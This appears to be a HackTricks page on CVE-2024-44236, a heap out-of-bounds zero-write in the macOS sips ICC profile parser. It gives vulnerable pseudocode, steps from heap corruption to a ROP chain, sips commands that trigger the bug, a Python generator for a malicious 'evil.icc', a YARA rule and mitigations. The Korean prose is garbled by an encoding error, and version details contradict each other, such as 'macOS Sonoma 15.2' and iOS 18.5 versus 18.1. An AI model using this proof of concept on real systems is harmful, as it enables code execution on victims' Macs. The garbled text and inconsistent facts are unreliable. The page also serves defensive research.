WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ฐœ์š”

Apple macOS Scriptable Image Processing System (sips) ICC ํ”„๋กœํŒŒ์ผ ํŒŒ์„œ์—์„œ ๋ฐœ์ƒํ•˜๋Š” ์ œ๋กœ ์“ฐ๊ธฐ ์ทจ์•ฝ์  (macOS 15.0.1, sips-307)์€ ๊ณต๊ฒฉ์ž๊ฐ€ ํž™ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ๋ฅผ ์†์ƒ์‹œํ‚ค๊ณ  ์›์‹œ๋ฅผ ์ „์ฒด ์ฝ”๋“œ ์‹คํ–‰์œผ๋กœ ์ „ํ™˜ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด ๋ฒ„๊ทธ๋Š” lutAToBType (mAB ) ๋ฐ lutBToAType (mBA ) ํƒœ๊ทธ์˜ offsetToCLUT ํ•„๋“œ ์ฒ˜๋ฆฌ์— ์žˆ์Šต๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๊ฐ€ offsetToCLUT == tagDataSize๋กœ ์„ค์ •ํ•˜๋ฉด, ํŒŒ์„œ๋Š” ํž™ ๋ฒ„ํผ ๋์—์„œ 16๋ฐ”์ดํŠธ๋ฅผ ์ง€์›๋‹ˆ๋‹ค. ํž™ ์Šคํ”„๋ ˆ์ด๋ง์„ ํ†ตํ•ด ๊ณต๊ฒฉ์ž๋Š” ํ• ๋‹น์ž ๊ตฌ์กฐ์ฒด๋‚˜ ๋‚˜์ค‘์— ์—ญ์ฐธ์กฐ๋  C++ ํฌ์ธํ„ฐ๋ฅผ ์ œ๋กœํ™”ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋Š” ์ž„์˜ ์“ฐ๊ธฐ-์‹คํ–‰ ์ฒด์ธ (CVE-2024-44236, CVSS 7.8)์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.

Apple์€ macOS Sonoma 15.2 / Ventura 14.7.1์—์„œ ์ด ๋ฒ„๊ทธ๋ฅผ ํŒจ์น˜ํ–ˆ์Šต๋‹ˆ๋‹ค (2024๋…„ 10์›” 30์ผ). ๋‘ ๋ฒˆ์งธ ๋ณ€ํ˜• (CVE-2025-24185)์€ 2025๋…„ 4์›” 1์ผ macOS 15.5 ๋ฐ iOS/iPadOS 18.5์—์„œ ์ˆ˜์ •๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

์ทจ์•ฝํ•œ ์ฝ”๋“œ

// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
if (offsetToCLUT <= tagDataSize) {
// BAD โžœ zero 16 bytes starting *at* offsetToCLUT
for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
buffer[i] = 0;            // no bounds check vs allocated size!
}

Exploitation Steps

  1. ์•…์„ฑ .icc ํ”„๋กœํŒŒ์ผ ๋งŒ๋“ค๊ธฐ
  • ์ตœ์†Œํ•œ์˜ ICC ํ—ค๋”(acsp)๋ฅผ ์„ค์ •ํ•˜๊ณ  ํ•˜๋‚˜์˜ mAB (๋˜๋Š” mBA ) ํƒœ๊ทธ๋ฅผ ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค.
  • ํƒœ๊ทธ ํ…Œ์ด๋ธ”์„ ๊ตฌ์„ฑํ•˜์—ฌ offsetToCLUT๊ฐ€ ํƒœ๊ทธ ํฌ๊ธฐ(tagDataSize)์™€ ๊ฐ™๋„๋ก ํ•ฉ๋‹ˆ๋‹ค.
  • ํƒœ๊ทธ ๋ฐ”๋กœ ๋’ค์— ๊ณต๊ฒฉ์ž๊ฐ€ ์ œ์–ดํ•˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ๋ฐฐ์น˜ํ•˜์—ฌ 16๊ฐœ์˜ ์ œ๋กœ ์“ฐ๊ธฐ๊ฐ€ ํ• ๋‹น์ž ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ์™€ ๊ฒน์น˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค.
  1. ํ”„๋กœํŒŒ์ผ์— ์˜ํ–ฅ์„ ์ฃผ๋Š” sips ์ž‘์—…์œผ๋กœ ํŒŒ์‹ฑ ํŠธ๋ฆฌ๊ฑฐํ•˜๊ธฐ
# ๊ฒ€์ฆ ๊ฒฝ๋กœ (์ถœ๋ ฅ ํŒŒ์ผ ํ•„์š” ์—†์Œ)
sips --verifyColor evil.icc
# ๋˜๋Š” ํ”„๋กœํŒŒ์ผ์„ ํฌํ•จํ•˜๋Š” ์ด๋ฏธ์ง€๋ฅผ ๋ณ€ํ™˜ํ•  ๋•Œ ์•”๋ฌต์ ์œผ๋กœ
sips -s format png payload.jpg --out out.png
  1. ํž™ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ์†์ƒ โžœ ์ž„์˜ ์“ฐ๊ธฐ โžœ ROP Apple์˜ ๊ธฐ๋ณธ nano_zone ํ• ๋‹น์ž์—์„œ 16๋ฐ”์ดํŠธ ์Šฌ๋กฏ์˜ ๋ฉ”ํƒ€๋ฐ์ดํ„ฐ๋Š” ์ •๋ ฌ๋œ 0x1000 ์Šฌ๋žฉ ๋ฐ”๋กœ ๋’ค์— ์œ„์น˜ํ•ฉ๋‹ˆ๋‹ค. ํ”„๋กœํŒŒ์ผ์˜ ํƒœ๊ทธ๋ฅผ ๊ทธ๋Ÿฌํ•œ ์Šฌ๋žฉ์˜ ๋์— ๋ฐฐ์น˜ํ•จ์œผ๋กœ์จ 16๊ฐœ์˜ ์ œ๋กœ ์“ฐ๊ธฐ๊ฐ€ meta->slot_B๋ฅผ ๋ฎ์–ด์”๋‹ˆ๋‹ค. ์ดํ›„ free๊ฐ€ ๋ฐœ์ƒํ•˜๋ฉด, ์˜ค์—ผ๋œ ํฌ์ธํ„ฐ๊ฐ€ ์ž‘์€ ์ž์œ  ๋ชฉ๋ก์— ํ์— ์ถ”๊ฐ€๋˜์–ด ๊ณต๊ฒฉ์ž๊ฐ€ ์ž„์˜ ์ฃผ์†Œ์— ๊ฐ€์งœ ๊ฐ์ฒด๋ฅผ ํ• ๋‹นํ•˜๊ณ  sips์—์„œ ์‚ฌ์šฉ๋˜๋Š” C++ vtable ํฌ์ธํ„ฐ๋ฅผ ๋ฎ์–ด์“ธ ์ˆ˜ ์žˆ๊ฒŒ ํ•˜๋ฉฐ, ๋งˆ์ง€๋ง‰์œผ๋กœ ์•…์„ฑ ICC ๋ฒ„ํผ์— ์ €์žฅ๋œ ROP ์ฒด์ธ์œผ๋กœ ์‹คํ–‰์„ ์ „ํ™˜ํ•ฉ๋‹ˆ๋‹ค.

๋น ๋ฅธ PoC ์ƒ์„ฑ๊ธฐ (Python 3)

#!/usr/bin/env python3
import struct, sys

HDR = b'acsp'.ljust(128, b'\0')          # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)]              # one tag directly after header
profile  = HDR
profile += struct.pack('>I', len(TAGS))  # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)

mab = bytearray(52)                      # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52)      # offsetToCLUT = size (OOB start)
profile += mab

open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))

YARA ํƒ์ง€ ๊ทœ์น™

rule ICC_mAB_offsetToCLUT_anomaly
{
meta:
description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
author       = "HackTricks"
strings:
$magic = { 61 63 73 70 }          // 'acsp'
$mab   = { 6D 41 42 20 }          // 'mAB '
$mba   = { 6D 42 41 20 }          // 'mBA '
condition:
$magic at 0 and
for any i in (0 .. 10):           // up to 10 tags
(
($mab at 132 + 12*i or $mba at 132 + 12*i) and
uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size
)
}

Impact

์กฐ์ž‘๋œ ICC ํ”„๋กœํŒŒ์ผ์„ ์—ด๊ฑฐ๋‚˜ ์ฒ˜๋ฆฌํ•˜๋ฉด ํ˜ธ์ถœํ•˜๋Š” ์‚ฌ์šฉ์ž์˜ ์ปจํ…์ŠคํŠธ์—์„œ ์›๊ฒฉ ์ž„์˜ ์ฝ”๋“œ ์‹คํ–‰์ด ๋ฐœ์ƒํ•˜๋ฉฐ (๋ฏธ๋ฆฌ๋ณด๊ธฐ, QuickLook, Safari ์ด๋ฏธ์ง€ ๋ Œ๋”๋ง, ๋ฉ”์ผ ์ฒจ๋ถ€ํŒŒ์ผ ๋“ฑ), ํ”„๋กœํŒŒ์ผ์ด ๊ทธ๋ ‡์ง€ ์•Š์€ ์ด๋ฏธ์ง€(PNG/JPEG/TIFF) ๋‚ด๋ถ€์— ํฌํ•จ๋  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— Gatekeeper๋ฅผ ์šฐํšŒํ•ฉ๋‹ˆ๋‹ค.

Detection & Mitigation

  • ํŒจ์น˜! ํ˜ธ์ŠคํŠธ๊ฐ€ macOS โ‰ฅ 15.2 / 14.7.1 (๋˜๋Š” iOS/iPadOS โ‰ฅ 18.1)์„ ์‹คํ–‰ํ•˜๊ณ  ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค.
  • ์ด๋ฉ”์ผ ๊ฒŒ์ดํŠธ์›จ์ด ๋ฐ EDR ์†”๋ฃจ์…˜์— ์œ„์˜ YARA ๊ทœ์น™์„ ๋ฐฐํฌํ•˜์‹ญ์‹œ์˜ค.
  • ์‹ ๋ขฐํ•  ์ˆ˜ ์—†๋Š” ํŒŒ์ผ์„ ์ถ”๊ฐ€๋กœ ์ฒ˜๋ฆฌํ•˜๊ธฐ ์ „์— exiftool -icc_profile= -overwrite_original <file>๋กœ ํฌํ•จ๋œ ICC ํ”„๋กœํŒŒ์ผ์„ ์ œ๊ฑฐํ•˜๊ฑฐ๋‚˜ ์ •๋ฆฌํ•˜์‹ญ์‹œ์˜ค.
  • ๋ฏธ์ง€์˜ ์ฝ˜ํ…์ธ ๋ฅผ ๋ถ„์„ํ•  ๋•Œ ์ƒŒ๋“œ๋ฐ•์Šคํ™”๋œ โ€œํˆฌ๋ช…์„ฑ ๋ฐ ํ˜„๋Œ€ํ™”โ€ VM ๋‚ด์—์„œ ๋ฏธ๋ฆฌ๋ณด๊ธฐ/QuickLook์„ ๊ฐ•ํ™”ํ•˜์‹ญ์‹œ์˜ค.
  • DFIR์˜ ๊ฒฝ์šฐ, ํ†ตํ•ฉ ๋กœ๊ทธ์—์„œ ์ƒŒ๋“œ๋ฐ•์Šคํ™”๋œ ์•ฑ์— ์˜ํ•ด sips --verifyColor ๋˜๋Š” ColorSync ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ ๋กœ๋“œ์˜ ์ตœ๊ทผ ์‹คํ–‰์„ ์ฐพ์œผ์‹ญ์‹œ์˜ค.

References

  • Trend Micro Zero Day Initiative advisory ZDI-24-1445 โ€“ โ€œApple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)โ€ https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
  • Apple security updates HT213981 โ€œAbout the security content of macOS Sonoma 15.2โ€ https://support.apple.com/en-us/HT213981

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ